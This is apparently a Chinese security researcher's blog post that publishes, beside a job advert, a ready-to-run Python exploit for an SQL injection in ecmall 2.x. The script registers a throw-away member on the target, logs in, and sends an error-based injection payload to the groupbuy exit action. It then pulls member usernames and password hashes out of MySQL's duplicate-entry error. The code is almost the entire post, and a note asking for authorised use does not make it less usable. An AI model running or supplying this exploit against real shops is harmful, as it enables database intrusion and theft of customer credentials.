今天看到了 ecmall 2.x 通杀 SQL 注入这个漏洞。我在公司现在主要做安全研究,写了一份分析报告;漏洞分析都要附带 EXP,顺便把 EXP 发到博客上,写得比较简单。
PS:公司还缺两个安全服务工程师,一个安全研究员。安全服务工程师的招聘信息看:http://www.cnseay.com/3440/
EXP:
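#coding=utf-8
#author:Seay
#blog:www.cnseay.com
"""Proof-of-concept for the ecmall 2.x SQL injection in
``index.php?app=buyer_groupbuy&act=exit_group`` (``id`` parameter).

Flow: register a throw-away member, log in with it, then request the
injected ``id`` and read ``user_name`` + ``password`` of the first
``ecm_member`` row out of MySQL's ``Duplicate entry`` error text (the
``floor(rand(0)*2)`` / ``group by`` collision trick).

What a tester should know before running it:

* run it only against hosts you are authorised to test -- the script
  creates a member account on the target and provokes a database error
  there, both of which leave traces;
* the target has to echo MySQL error messages into the page and use the
  default ``ecm_`` table prefix, otherwise the result is ``Sorry,failed``;
* only the first member row is dumped (``limit 0,1``); change the offset
  in ``SQLI_PAYLOAD`` to walk the table;
* everything travels over plain HTTP, and the registration credentials
  below are fixed, so a second run against the same host will fail to
  register (the registration response is not checked).

Runs under Python 2 (the original environment) and Python 3.
"""
import re
import sys
from contextlib import closing

try:  # Python 2
    import urllib2
    import cookielib
    from urllib import urlencode, quote
    import HTMLParser  # noqa: F401  (unused, kept from the original)
    import urlparse    # noqa: F401  (unused, kept from the original)
except ImportError:  # Python 3
    import urllib.request as urllib2
    import http.cookiejar as cookielib
    from urllib.parse import urlencode, quote
    import html.parser as HTMLParser  # noqa: F401
    import urllib.parse as urlparse   # noqa: F401
import string  # noqa: F401  (unused, kept from the original)

target = 'www.cnseay.com'
user_name = 'makelove'
password = 'onebyone'
email = '[email protected]'

USER_AGENT = ('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) '
              'Gecko/20100101 Firefox/24.0')
FORM_HEADERS = {
    'User-Agent': USER_AGENT,
    'Content-Type': 'application/x-www-form-urlencoded',
}

# Error-based extraction: the inner select runs once per row of
# information_schema.tables; floor(rand(0)*2) makes two rows land in the same
# GROUP BY bucket and MySQL names the colliding key -- which carries the
# concatenated user_name+password -- in its "Duplicate entry" error.
SQLI_PAYLOAD = ('1 union select 1 from (select count(*),concat(floor(rand(0)*2),'
                '(select concat(user_name,password) from ecm_member limit 0,1))a '
                'from information_schema.tables group by a)b')

# The colliding key starts with the '1' produced by floor(rand(0)*2); the
# capture group is the leaked user_name+password.
LEAK_RE = re.compile(r"Duplicate entry '1(.*)' for key")


def build_exploit_url(host):
    """Return the injected exit_group URL for *host* (bare host name, no scheme)."""
    return ('http://' + host + '/index.php?app=buyer_groupbuy&act=exit_group&id='
            + quote(SQLI_PAYLOAD))


def extract_leaked_row(page_text):
    """Return the user_name+password string leaked in *page_text*, or None."""
    match = LEAK_RE.search(page_text)
    return match.group(1) if match else None


def _new_session():
    """Install a fresh cookie-aware opener as the urlopen default; return its jar.

    Each phase (registration, login) starts from an empty jar, as the
    original script did.
    """
    jar = cookielib.LWPCookieJar()
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar),
                                  urllib2.HTTPHandler)
    urllib2.install_opener(opener)
    return jar


def _post_form(url, fields):
    """POST *fields* as a urlencoded form to *url*; return the open response."""
    body = urlencode(fields)
    if not isinstance(body, bytes):  # Python 3: urlopen wants a bytes body
        body = body.encode('utf-8')
    return urllib2.urlopen(urllib2.Request(url, body, FORM_HEADERS))


def _open_with_error_body(request):
    """urlopen that hands back 4xx/5xx responses instead of raising.

    The leaked value lives in the database error page, which the target may
    serve with a non-2xx status; HTTPError is itself a readable response, so
    returning it lets the caller still parse the body.
    """
    try:
        return urllib2.urlopen(request)
    except urllib2.HTTPError as err:
        return err


def reguser(host=None):
    """Register the throw-away member on *host* (defaults to the global ``target``).

    The registration response is not inspected, so an already-taken user name
    is not detected here; it surfaces only as a failed login later.
    """
    host = target if host is None else host
    print('user register...')
    hosturl = 'http://' + host + '/index.php'
    posturl = 'http://' + host + '/index.php?app=member&act=register&ret_url='
    _new_session()
    # GET the front page before posting -- presumably to obtain a session
    # cookie the form is tied to; the original did the same (response unused).
    urllib2.urlopen(hosturl).close()
    fields = {
        'user_name': user_name,
        'password': password,
        'password_confirm': password,
        'email': email,
        'agree': '1',
    }
    _post_form(posturl, fields).close()


def login_exploit(host=None):
    """Log in as the registered member and fire the injection against *host*.

    Prints ``Success:<user_name+password>`` or ``Sorry,failed``; returns the
    leaked string or None so the result can also be consumed programmatically.
    """
    host = target if host is None else host
    print('user login...')
    posturl = 'http://' + host + '/index.php?app=member&act=login&synlogout=1'
    jar = _new_session()
    _post_form(posturl, {'user_name': user_name, 'password': password}).close()
    if len(jar) == 0:
        # Without a session cookie exit_group is reached anonymously; carry on
        # so the outcome is still reported, but say why it may fail.
        print('warning: login set no cookie, exploit request will be anonymous')

    print('exploit...\n')
    request = urllib2.Request(build_exploit_url(host))
    request.add_header('User-Agent', USER_AGENT)
    # Session cookies are attached by the HTTPCookieProcessor installed above
    # (the original copied only the first Set-Cookie fragment by hand).
    with closing(_open_with_error_body(request)) as response:
        text = response.read()
    if not isinstance(text, str):  # Python 3 hands back bytes
        text = text.decode('utf-8', 'replace')

    leaked = extract_leaked_row(text)
    if leaked is None:
        print('Sorry,failed')
    else:
        print('Success:' + leaked)
    return leaked


def main(argv=None):
    """Command-line entry point: ``python exp.py <host>``.

    Returns the process exit status: 2 on a usage error (the original exited
    0 there, which hides the mistake from calling scripts), 0 otherwise.
    """
    global target
    argv = sys.argv if argv is None else argv
    if len(argv) < 2:
        print('argument error')
        print('example: ' + (argv[0] if argv else 'exp.py') + ' domain')
        return 2
    target = argv[1]
    reguser(target)
    login_exploit(target)
    return 0


if __name__ == '__main__':
    sys.exit(main())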